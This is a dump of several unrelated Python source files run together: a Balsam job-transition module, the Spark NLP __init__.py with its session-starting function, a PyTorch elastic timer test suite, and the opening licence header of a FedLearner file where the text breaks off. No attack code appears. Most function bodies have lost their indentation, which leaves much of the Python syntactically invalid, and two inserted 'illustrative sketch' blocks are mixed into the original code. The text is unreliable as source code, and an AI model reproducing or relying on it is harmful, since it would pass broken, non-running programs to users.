acquired = manager.acquire(to_acquire)
if len(acquired) < len(to_acquire):
st = random.random()
time.sleep(st)
logger.debug(f"failed to acquire {len(to_acquire)}; only got {len(acquired)}")
if acquired:
logger.debug(f'Acquired {len(acquired)} new jobs')
acquired = BalsamJob.objects.filter(pk__in=acquired)
job_cache.extend(acquired)
for job in job_cache:
job.__old_state = job.state
def release_jobs(job_cache):
    manager = BalsamJob.source
    to_release = [
        j.pk for j in job_cache if
        (j.state not in PROCESSABLE_STATES)
        or (j.state == 'AWAITING_PARENTS')
    ]
    if to_release:
        manager.release(to_release)
    return [j for j in job_cache if j.pk not in to_release]
def main(thread_idx, num_threads, wf_name):
global EXIT_FLAG
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
manager = BalsamJob.source
manager.workflow = wf_name
random.seed(multiprocessing.current_process().pid)
time.sleep(random.random())
manager.start_tick()
try:
_main(thread_idx, num_threads)
except:
buf = StringIO()
print_exc(file=buf)
logger.critical(f"Uncaught exception:\n%s", buf.getvalue())
finally:
manager.release_all_owned()
logger.debug('Transition process finished: released all jobs')
def _main(thread_idx, num_threads):
global EXIT_FLAG
manager = BalsamJob.source
job_cache = []
last_refresh = 0
refresh_period = 5
while not EXIT_FLAG:
# Update in-memory cache of locked BalsamJobs
elapsed = time.time() - last_refresh
if elapsed > refresh_period:
if len(job_cache) < JOBCACHE_LIMIT:
refresh_cache(job_cache, num_threads, thread_idx)
last_refresh = time.time()
else:
time.sleep(1)
# Fast-forward transitions & release locks
fast_forward(job_cache)
job_cache = release_jobs(job_cache)
# Run transitions (one pass over all jobs)
for job in job_cache:
transition_function = TRANSITIONS[job.state]
try:
transition_function(job)
except BalsamTransitionError as e:
job.state = 'FAILED'
buf = StringIO()
print_exc(file=buf)
job.__fail_msg = buf.getvalue()
logger.exception(f"Marking {job.cute_id} as FAILED")
if EXIT_FLAG:
break
# Update states in bulk
update_states_from_cache(job_cache)
job_cache = release_jobs(job_cache)
logger.info('EXIT_FLAG: exiting main loop')
def check_parents(job):
'''Check job's dependencies, update to READY if satisfied'''
num_parents = len(job.get_parents_by_id())
if num_parents == 0 or not job.wait_for_parents:
ready = True
else:
parents = job.get_parents()
ready = num_parents == parents.filter(state='JOB_FINISHED').count()
if ready:
job.state = 'READY'
logger.debug(f'{job.cute_id} ready')
elif job.state != 'AWAITING_PARENTS':
job.state = 'AWAITING_PARENTS'
logger.info(f'{job.cute_id} waiting for {num_parents} parents')
elif parents.filter(state__in=['FAILED', 'USER_KILLED']).exists():
job.state = 'FAILED'
job.__fail_msg = 'One or more parent jobs failed'
def fast_forward(job_cache):
'''Make several passes over the job list; advancing states in order'''
# Check parents
check_jobs = (j for j in job_cache if j.state in 'CREATED AWAITING_PARENTS'.split())
for job in check_jobs: check_parents(job)
# Skip stage-in
stagein_jobs = (j for j in job_cache if j.state == 'READY')
for job in stagein_jobs:
workdir = job.working_directory
if not os.path.exists(workdir):
os.makedirs(workdir)
logger.info(f"{job.cute_id} created working directory {workdir}")
hasParents = bool(job.get_parents_by_id())
hasInput = bool(job.input_files)
hasRemote = bool(job.stage_in_url)
if not hasRemote and not (hasParents and hasInput): job.state = 'STAGED_IN'
# Skip preprocess
preprocess_jobs = (j for j in job_cache if j.state == 'STAGED_IN')
for job in preprocess_jobs:
if not job.preprocess:
job.state = 'PREPROCESSED'
# RUN_DONE: skip postprocess
done_jobs = (j for j in job_cache if j.state=='RUN_DONE' and not j.postprocess)
for job in done_jobs:
job.state = 'POSTPROCESSED'
# Timeout: retry
retry_jobs = (j for j in job_cache if j.state=='RUN_TIMEOUT'
and j.auto_timeout_retry and not j.post_timeout_handler)
for job in retry_jobs:
job.state = 'RESTART_READY'
# Timeout: fail
timefail_jobs = (j for j in job_cache if j.state=='RUN_TIMEOUT'
and not j.auto_timeout_retry
and not (j.postprocess and j.post_timeout_handler)
)
for job in timefail_jobs:
job.state = 'FAILED'
# Error: fail
errfail_jobs = (j for j in job_cache if j.state=='RUN_ERROR'
and not (j.post_error_handler and j.postprocess)
)
for job in errfail_jobs:
job.state = 'FAILED'
# skip stageout (finished)
stageout_jobs = (j for j in job_cache if j.state=='POSTPROCESSED'
and not (j.stage_out_url and j.stage_out_files)
)
for job in stageout_jobs:
job.state = 'JOB_FINISHED'
update_states_from_cache(job_cache)
def stage_in(job):
logger.debug(f'{job.cute_id} in stage_in')
work_dir = job.working_directory
if not os.path.exists(work_dir):
os.makedirs(work_dir)
logger.debug(f"{job.cute_id} working directory {work_dir}")
# stage in all remote urls
# TODO: stage_in remote transfer should allow a list of files and folders,
# rather than copying just one entire folder
url_in = job.stage_in_url
if url_in:
logger.info(f"{job.cute_id} transfer in from {url_in}")
try:
transfer.stage_in(f"{url_in}", f"{work_dir}")
except Exception as e:
message = 'Exception received during stage_in: ' + str(e)
raise BalsamTransitionError(message) from e
# create unique symlinks to "input_files" patterns from parents
# TODO: handle data flow from remote sites transparently
matches = []
parents = job.get_parents()
input_patterns = job.input_files.split()
logger.debug(f"{job.cute_id} searching parent workdirs for {input_patterns}")
for parent in parents:
parent_dir = parent.working_directory
for pattern in input_patterns:
path = os.path.join(parent_dir, pattern)
matches.extend((parent.pk, match)
for match in glob.glob(path))
for parent_pk, inp_file in matches:
basename = os.path.basename(inp_file)
new_path = os.path.join(work_dir, basename)
if os.path.exists(new_path):
new_path += f"_{str(parent_pk)[:8]}"
# pointing to src, named dst
logger.info(f"{job.cute_id} {new_path} --> {inp_file}")
try:
os.symlink(src=inp_file, dst=new_path)
except FileExistsError:
logger.warning(f"Symlink at {new_path} already exists; skipping creation")
except Exception as e:
raise BalsamTransitionError(
f"Exception received during symlink: {e}") from e
job.state = 'STAGED_IN'
logger.debug(f"{job.cute_id} stage_in done")
def stage_out(job):
'''copy from the local working_directory to the output_url '''
logger.debug(f'{job.cute_id} in stage_out')
url_out = job.stage_out_url
if not url_out:
job.state = 'JOB_FINISHED'
logger.debug(f'{job.cute_id} no stage_out_url: done')
return
stage_out_patterns = job.stage_out_files.split()
logger.debug(f"{job.cute_id} stage out files match: {stage_out_patterns}")
work_dir = job.working_directory
matches = []
for pattern in stage_out_patterns:
path = os.path.join(work_dir, pattern)
matches.extend(glob.glob(path))
if matches:
logger.info(f"{job.cute_id} stage out files: {matches}")
with tempfile.TemporaryDirectory() as stagingdir:
try:
for f in matches:
base = os.path.basename(f)
dst = os.path.join(stagingdir, base)
shutil.copyfile(src=f, dst=dst)
logger.info(f"staging {f} out for transfer")
logger.info(f"transferring to {url_out}")
transfer.stage_out(f"{stagingdir}/*", f"{url_out}/")
except Exception as e:
message = f'Exception received during stage_out: {e}'
raise BalsamTransitionError(message) from e
job.state = 'JOB_FINISHED'
logger.debug(f'{job.cute_id} stage_out done')
def preprocess(job):
logger.debug(f'{job.cute_id} in preprocess')
# Get preprocesser exe
preproc_app = job.preprocess
if not preproc_app:
job.state = 'PREPROCESSED'
return
if not os.path.exists(preproc_app.split()[0]):
# TODO: look for preproc in the EXE directories
message = f"Preprocessor {preproc_app} does not exist on filesystem"
raise BalsamTransitionError(message)
# Create preprocess-specific environment
envs = job.get_envs()
# Run preprocesser with special environment in job working directory
out = os.path.join(job.working_directory, f"preprocess.log")
with open(out, 'w') as fp:
fp.write(f"# Balsam Preprocessor: {preproc_app}")
fp.flush()
try:
args = preproc_app.split()
logger.info(f"{job.cute_id} preprocess Popen {args}")
proc = subprocess.Popen(args, stdout=fp,
stderr=subprocess.STDOUT, env=envs,
cwd=job.working_directory,
)
retcode = proc.wait(timeout=PREPROCESS_TIMEOUT_SECONDS)
proc.communicate()
except Exception as e:
message = f"Preprocess failed: {e}"
try:
proc.kill()
except:
pass
raise BalsamTransitionError(message) from e
if retcode != 0:
tail = get_tail(out)
message = f"{job.cute_id} preprocess returned {retcode}:\n{tail}"
raise BalsamTransitionError(message)
job.state = 'PREPROCESSED'
logger.debug(f"{job.cute_id} preprocess done")
def postprocess(job, *, error_handling=False, timeout_handling=False):
logger.debug(f'{job.cute_id} in postprocess')
if error_handling and timeout_handling:
raise ValueError("Both error-handling and timeout-handling is invalid")
if error_handling:
logger.info(f'{job.cute_id} handling RUN_ERROR')
if timeout_handling:
logger.info(f'{job.cute_id} handling RUN_TIMEOUT')
# Get postprocesser exe
postproc_app = job.postprocess
# If there is no postprocessor, move on (unless in error_handling mode)
if not postproc_app:
if error_handling:
message = f"{job.cute_id} handle error: no postprocessor found!"
raise BalsamTransitionError(message)
elif timeout_handling:
job.state = 'RESTART_READY'
logger.warning(f'{job.cute_id} unhandled job timeout: marked RESTART_READY')
return
else:
job.state = 'POSTPROCESSED'
logger.debug(f'{job.cute_id} no postprocess: skipped')
return
if not os.path.exists(postproc_app.split()[0]):
# TODO: look for postproc in the EXE directories
message = f"Postprocessor {postproc_app} does not exist on filesystem"
raise BalsamTransitionError(message)
# Create postprocess-specific environment
envs = job.get_envs(timeout=timeout_handling, error=error_handling)
# Run postprocesser with special environment in job working directory
out = os.path.join(job.working_directory, f"postprocess.log")
with open(out, 'w') as fp:
fp.write(f"# Balsam Postprocessor: {postproc_app}\n")
if timeout_handling:
fp.write("# Invoked to handle RUN_TIMEOUT\n")
if error_handling:
fp.write("# Invoked to handle RUN_ERROR\n")
fp.flush()
try:
args = postproc_app.split()
logger.info(f"{job.cute_id} postprocess Popen {args}")
proc = subprocess.Popen(args, stdout=fp,
stderr=subprocess.STDOUT, env=envs,
cwd=job.working_directory,
)
retcode = proc.wait(timeout=POSTPROCESS_TIMEOUT_SECONDS)
proc.communicate()
except Exception as e:
message = f"Postprocess failed: {e}"
try:
proc.kill()
except:
pass
raise BalsamTransitionError(message) from e
if retcode != 0:
tail = get_tail(out, nlines=30)
message = f"{job.cute_id} postprocess returned {retcode}:\n{tail}"
raise BalsamTransitionError(message)
job.refresh_from_db()
# If postprocessor handled error or timeout, it should have changed job's
# state. If it failed to do this, mark FAILED. Otherwise, POSTPROCESSED.
if error_handling and job.state == 'RUN_ERROR':
message = f"{job.cute_id} Error handling didn't fix job state: marking FAILED"
raise BalsamTransitionError(message)
if timeout_handling and job.state == 'RUN_TIMEOUT':
message = f"{job.cute_id} Timeout handling didn't change job state: marking FAILED"
raise BalsamTransitionError(message)
# Only move the state along to POSTPROCESSED if the job is still in RUN_DONE
# and the post.py returned normally. Otherwise, post.py might mark a job
# FAILED, and you override it with POSTPROCESSED, breaking the workflow.
if job.state == 'RUN_DONE':
job.state = 'POSTPROCESSED'
logger.debug(f"{job.cute_id} postprocess done")
def handle_timeout(job):
if job.post_timeout_handler:
logger.debug(f'{job.cute_id} invoking postprocess with timeout_handling flag')
postprocess(job, timeout_handling=True)
else:
raise BalsamTransitionError(f"{job.cute_id} no timeout handling: marking FAILED")
def handle_run_error(job):
if job.post_error_handler:
logger.debug(f'{job.cute_id} invoking postprocess with error_handling flag')
postprocess(job, error_handling=True)
else:
raise BalsamTransitionError("No error handler: run failed")
TRANSITIONS = {
'AWAITING_PARENTS': check_parents,
'READY': stage_in,
'STAGED_IN': preprocess,
'RUN_DONE': postprocess,
'RUN_TIMEOUT': handle_timeout,
'RUN_ERROR': handle_run_error,
'POSTPROCESSED': stage_out,
}
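# Illustrative sketch (an assumption, not part of the Balsam source): one way a worker
# loop could dispatch jobs through the TRANSITIONS table above. The fetch_jobs callable
# and the job.save() call are hypothetical stand-ins for the real job query/persistence API.
def run_transitions(fetch_jobs):
    for job in fetch_jobs():
        handler = TRANSITIONS.get(job.state)
        if handler is None:
            continue  # no transition defined for this state
        try:
            handler(job)
        except BalsamTransitionError as exc:
            logger.exception(f"{job.cute_id} transition failed: {exc}")
            job.state = 'FAILED'
        finally:
            job.save()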
|
__init__.py
|
# Copyright 2017-2022 John Snow Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import subprocess
import threading
from pyspark.sql import SparkSession
from sparknlp import annotator
from sparknlp.base import DocumentAssembler, Finisher, EmbeddingsFinisher, TokenAssembler, Chunk2Doc, Doc2Chunk
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.java_gateway import launch_gateway
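# The aliases below appear to map JVM-style package paths onto the Python `annotator`
# module, presumably so that serialized pipelines/params referencing those paths can be
# resolved on the Python side (an inference from the code, not documented here).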
sys.modules['com.johnsnowlabs.nlp.annotators'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.tokenizer'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.tokenizer.wordpiece'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.regex'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.crf'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.pos'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.pos.perceptron'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd.pragmatic'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd.deep'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda.pragmatic'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda.vivekn'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.norvig'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.symmetric'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser.dep'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser.typdep'] = annotator
sys.modules['com.johnsnowlabs.nlp.embeddings'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.classifier'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.classifier.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.context'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ld'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ld.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sentence_detector_dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.seq2seq'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ws'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.er'] = annotator
annotators = annotator
embeddings = annotator
def start(gpu=False,
spark23=False,
spark24=False,
spark32=False,
memory="16G",
cache_folder="",
log_folder="",
cluster_tmp_dir="",
real_time_output=False,
output_level=1):
"""Starts a PySpark instance with default parameters for Spark NLP.
The default parameters would result in the equivalent of:
.. code-block:: python
    :substitutions:

    SparkSession.builder \\
        .appName("Spark NLP") \\
        .master("local[*]") \\
        .config("spark.driver.memory", "16G") \\
        .config("spark.serializer", "org.apache.spark.serializer.KryoSerializer") \\
        .config("spark.kryoserializer.buffer.max", "2000M") \\
        .config("spark.driver.maxResultSize", "0") \\
        .config("spark.jars.packages", "com.johnsnowlabs.nlp:spark-nlp_2.12:|release|") \\
        .getOrCreate()
Parameters
----------
gpu : bool, optional
    Whether to enable GPU acceleration (must be set up correctly), by default False
spark23 : bool, optional
    Whether to use the Spark 2.3.x version of Spark NLP, by default False
spark24 : bool, optional
    Whether to use the Spark 2.4.x version of Spark NLP, by default False
spark32 : bool, optional
    Whether to use the Spark 3.2.x version of Spark NLP, by default False
memory : str, optional
    How much memory to allocate for the Spark driver, by default "16G"
cache_folder : str, optional
    The location to download and extract pretrained Models and Pipelines, by default ""
log_folder : str, optional
    The location to save logs from annotators during training, such as NerDLApproach,
    ClassifierDLApproach, SentimentDLApproach, MultiClassifierDLApproach, etc., by default ""
cluster_tmp_dir : str, optional
    The location to use on a cluster for temporary files, by default ""
real_time_output : bool, optional
    Whether to output in real time, by default False
output_level : int, optional
    Output level for logs, by default 1
Returns
-------
:class:`SparkSession`
    The initiated Spark session.
"""
current_version = "3.4.2"
class SparkNLPConfig:
def __init__(self):
self.master, self.app_name = "local[*]", "Spark NLP"
self.serializer, self.serializer_max_buffer = "org.apache.spark.serializer.KryoSerializer", "2000M"
self.driver_max_result_size = "0"
# Spark NLP on Apache Spark 3.2.x
self.maven_spark32 = "com.johnsnowlabs.nlp:spark-nlp-spark32_2.12:{}".format(current_version)
self.maven_gpu_spark32 = "com.johnsnowlabs.nlp:spark-nlp-gpu-spark32_2.12:{}".format(current_version)
# Spark NLP on Apache Spark 3.0.x/3.1.x
self.maven_spark = "com.johnsnowlabs.nlp:spark-nlp_2.12:{}".format(current_version)
self.maven_gpu_spark = "com.johnsnowlabs.nlp:spark-nlp-gpu_2.12:{}".format(current_version)
# Spark NLP on Apache Spark 2.4.x
self.maven_spark24 = "com.johnsnowlabs.nlp:spark-nlp-spark24_2.11:{}".format(current_version)
self.maven_gpu_spark24 = "com.johnsnowlabs.nlp:spark-nlp-gpu-spark24_2.11:{}".format(current_version)
# Spark NLP on Apache Spark 2.3.x
self.maven_spark23 = "com.johnsnowlabs.nlp:spark-nlp-spark23_2.11:{}".format(current_version)
self.maven_gpu_spark23 = "com.johnsnowlabs.nlp:spark-nlp-gpu-spark23_2.11:{}".format(current_version)
def start_without_realtime_output():
builder = SparkSession.builder \
.appName(spark_nlp_config.app_name) \
.master(spark_nlp_config.master) \
.config("spark.driver.memory", memory) \
.config("spark.serializer", spark_nlp_config.serializer) \
.config("spark.kryoserializer.buffer.max", spark_nlp_config.serializer_max_buffer) \
.config("spark.driver.maxResultSize", spark_nlp_config.driver_max_result_size)
if gpu and spark23:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark23)
elif gpu and spark24:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark24)
elif gpu and spark32:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark32)
elif spark23:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark23)
elif spark24:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark24)
elif spark32:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark32)
elif gpu:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark)
else:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark)
if cache_folder != '':
builder.config("spark.jsl.settings.pretrained.cache_folder", cache_folder)
if log_folder != '':
builder.config("spark.jsl.settings.annotator.log_folder", log_folder)
if cluster_tmp_dir != '':
builder.config("spark.jsl.settings.storage.cluster_tmp_dir", cluster_tmp_dir)
return builder.getOrCreate()
def start_with_realtime_output():
class SparkWithCustomGateway:
def __init__(self):
spark_conf = SparkConf()
spark_conf.setAppName(spark_nlp_config.app_name)
spark_conf.setMaster(spark_nlp_config.master)
spark_conf.set("spark.driver.memory", memory)
spark_conf.set("spark.serializer", spark_nlp_config.serializer)
spark_conf.set("spark.kryoserializer.buffer.max", spark_nlp_config.serializer_max_buffer)
spark_conf.set("spark.driver.maxResultSize", spark_nlp_config.driver_max_result_size)
if gpu and spark32:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_gpu_spark32)
elif spark32:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_spark32)
elif gpu:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_gpu_spark)
else:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_spark)
if cache_folder != '':
spark_conf.set("spark.jsl.settings.pretrained.cache_folder", cache_folder)
if log_folder != '':
spark_conf.set("spark.jsl.settings.annotator.log_folder", log_folder)
if cluster_tmp_dir != '':
spark_conf.set("spark.jsl.settings.storage.cluster_tmp_dir", cluster_tmp_dir)
# Make the py4j JVM stdout and stderr available without buffering
popen_kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'bufsize': 0
}
# Launch the gateway with our custom settings
self.gateway = launch_gateway(conf=spark_conf, popen_kwargs=popen_kwargs)
self.process = self.gateway.proc
# Use the gateway we launched
spark_context = SparkContext(gateway=self.gateway)
self.spark_session = SparkSession(spark_context)
self.out_thread = threading.Thread(target=self.output_reader)
self.error_thread = threading.Thread(target=self.error_reader)
self.std_background_listeners()
def std_background_listeners(self):
self.out_thread.start()
self.error_thread.start()
def output_reader(self):
for line in iter(self.process.stdout.readline, b''):
print('{0}'.format(line.decode('utf-8')), end='')
def error_reader(self):
RED = '\033[91m'
RESET = '\033[0m'
for line in iter(self.process.stderr.readline, b''):
if output_level == 0:
print(RED + '{0}'.format(line.decode('utf-8')) + RESET, end='')
else:
# output just info
pass
def shutdown(self):
self.spark_session.stop()
self.gateway.shutdown()
self.process.communicate()
self.out_thread.join()
self.error_thread.join()
return SparkWithCustomGateway()
spark_nlp_config = SparkNLPConfig()
if real_time_output:
if spark23 or spark24:
spark_session = start_without_realtime_output()
return spark_session
else:
# Available from Spark 3.0.x
class SparkRealTimeOutput:
def __init__(self):
self.__spark_with_custom_gateway = start_with_realtime_output()
self.spark_session = self.__spark_with_custom_gateway.spark_session
def shutdown(self):
self.__spark_with_custom_gateway.shutdown()
return SparkRealTimeOutput()
else:
spark_session = start_without_realtime_output()
return spark_session
def version():
"""Returns the current Spark NLP version.
Returns
-------
str
The current Spark NLP version.
"""
return '3.4.2'
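# Illustrative usage sketch (an assumption, not part of the Spark NLP source): how a caller
# might start a session with the defaults documented above. Guarded so it only runs when this
# module is executed directly.
if __name__ == "__main__":
    spark = start()  # e.g. start(gpu=True, spark32=True) for the GPU build on Spark 3.2.x
    print("Spark NLP version:", version())
    print("Apache Spark version:", spark.version)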
|
local_timer_test.py
|
# Owner(s): ["oncall: r2p"]
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import signal
import time
import unittest
import unittest.mock as mock
import torch.distributed.elastic.timer as timer
from torch.distributed.elastic.timer.api import TimerRequest
from torch.distributed.elastic.timer.local_timer import MultiprocessingRequestQueue
from torch.testing._internal.common_utils import (
run_tests,
IS_WINDOWS,
IS_MACOS,
TEST_WITH_DEV_DBG_ASAN,
TEST_WITH_TSAN,
)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
# func2 should time out
def func2(n, mp_queue):
if mp_queue is not None:
timer.configure(timer.LocalTimerClient(mp_queue))
if n > 0:
with timer.expires(after=0.1):
func2(n - 1, None)
time.sleep(0.2)
class LocalTimerTest(unittest.TestCase):
def setUp(self):
self.ctx = mp.get_context("spawn")
self.mp_queue = self.ctx.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
self.server.start()
def tearDown(self):
self.server.stop()
def test_exception_propagation(self):
with self.assertRaises(Exception, msg="foobar"):
with timer.expires(after=1):
raise Exception("foobar")
def test_no_client(self):
# no timer client configured; exception expected
timer.configure(None)
with self.assertRaises(RuntimeError):
with timer.expires(after=1):
pass
def test_client_interaction(self):
# no timer client configured but one passed in explicitly
# no exception expected
timer_client = timer.LocalTimerClient(self.mp_queue)
timer_client.acquire = mock.MagicMock(wraps=timer_client.acquire)
timer_client.release = mock.MagicMock(wraps=timer_client.release)
with timer.expires(after=1, scope="test", client=timer_client):
pass
timer_client.acquire.assert_called_once_with("test", mock.ANY)
timer_client.release.assert_called_once_with("test")
def test_happy_path(self):
timer.configure(timer.LocalTimerClient(self.mp_queue))
with timer.expires(after=0.5):
time.sleep(0.1)
def test_get_timer_recursive(self):
"""
If a function acquires a countdown timer with default scope,
then recursive calls to the function should re-acquire the
timer rather than creating a new one. That is, only the last
recursive call's timer will take effect.
"""
self.server.start()
timer.configure(timer.LocalTimerClient(self.mp_queue))
# func should not time out
def func(n):
if n > 0:
with timer.expires(after=0.1):
func(n - 1)
time.sleep(0.05)
func(4)
p = self.ctx.Process(target=func2, args=(2, self.mp_queue))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
@staticmethod
def _run(mp_queue, timeout, duration):
client = timer.LocalTimerClient(mp_queue)
timer.configure(client)
with timer.expires(after=timeout):
time.sleep(duration)
@unittest.skipIf(TEST_WITH_TSAN, "test is tsan incompatible")
def test_timer(self):
timeout = 0.1
duration = 1
p = mp.Process(target=self._run, args=(self.mp_queue, timeout, duration))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
def _enqueue_on_interval(mp_queue, n, interval, sem):
"""
enqueues ``n`` timer requests into ``mp_queue`` one element per
interval seconds. Releases the given semaphore once before going to work.
"""
sem.release()
for i in range(0, n):
mp_queue.put(TimerRequest(i, "test_scope", 0))
time.sleep(interval)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
class MultiprocessingRequestQueueTest(unittest.TestCase):
def test_get(self):
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
requests = request_queue.get(1, timeout=0.01)
self.assertEqual(0, len(requests))
request = TimerRequest(1, "test_scope", 0)
mp_queue.put(request)
requests = request_queue.get(2, timeout=0.01)
self.assertEqual(1, len(requests))
self.assertIn(request, requests)
@unittest.skipIf(
TEST_WITH_TSAN,
"test incompatible with tsan",
)
def test_get_size(self):
"""
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=n*interval+delta)``
yields all ``n`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(
target=_enqueue_on_interval, args=(mp_queue, n, interval, sem)
)
p.start()
sem.acquire() # blocks until the process has started to run the function
timeout = interval * (n + 1)
start = time.time()
requests = request_queue.get(n, timeout=timeout)
self.assertLessEqual(time.time() - start, timeout + interval)
self.assertEqual(n, len(requests))
def test_get_less_than_size(self):
"""
Tests slow producer.
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=(interval * n/2))``
yields at most ``n/2`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(
target=_enqueue_on_interval, args=(mp_queue, n, interval, sem)
)
p.start()
sem.acquire() # blocks until the process has started to run the function
requests = request_queue.get(n, timeout=(interval * (n / 2)))
self.assertLessEqual(n / 2, len(requests))
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
class LocalTimerServerTest(unittest.TestCase):
def setUp(self):
self.mp_queue = mp.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
def tearDown(self):
self.server.stop()
def test_watchdog_call_count(self):
"""
checks that the watchdog function ran wait/interval +- 1 times
"""
self.server._run_watchdog = mock.MagicMock(wraps=self.server._run_watchdog)
wait = 0.1
self.server.start()
time.sleep(wait)
self.server.stop()
watchdog_call_count = self.server._run_watchdog.call_count
self.assertGreaterEqual(
watchdog_call_count, int(wait / self.max_interval) - 1
)
self.assertLessEqual(watchdog_call_count, int(wait / self.max_interval) + 1)
def test_watchdog_empty_queue(self):
"""
checks that the watchdog can run on an empty queue
"""
self.server._run_watchdog()
def _expired_timer(self, pid, scope):
expired = time.time() - 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=expired)
def _valid_timer(self, pid, scope):
valid = time.time() + 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=valid)
def _release_timer(self, pid, scope):
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=-1)
@mock.patch("os.kill")
def test_expired_timers(self, mock_os_kill):
"""
tests that a single expired timer on a process should terminate
the process and clean up all pending timers that were owned by the process
"""
test_pid = -3
self.mp_queue.put(self._expired_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_called_once_with(test_pid, signal.SIGKILL)
@mock.patch("os.kill")
def test_acquire_release(self, mock_os_kill):
"""
tests that:
1. a timer can be acquired then released (should not terminate process)
2. a timer can be vacuously released (e.g. no-op)
"""
test_pid = -3
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_not_called()
@mock.patch("os.kill")
def test_valid_timers(self, mock_os_kill):
"""
tests that valid timers are processed correctly and the process is left alone
"""
self.mp_queue.put(self._valid_timer(pid=-3, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-3, scope="test2"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test2"))
self.server._run_watchdog()
self.assertEqual(4, len(self.server._timers))
self.assertTrue((-3, "test1") in self.server._timers)
self.assertTrue((-3, "test2") in self.server._timers)
self.assertTrue((-2, "test1") in self.server._timers)
self.assertTrue((-2, "test2") in self.server._timers)
mock_os_kill.assert_not_called()
if __name__ == "__main__":
run_tests()
|
disabled_bridge.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
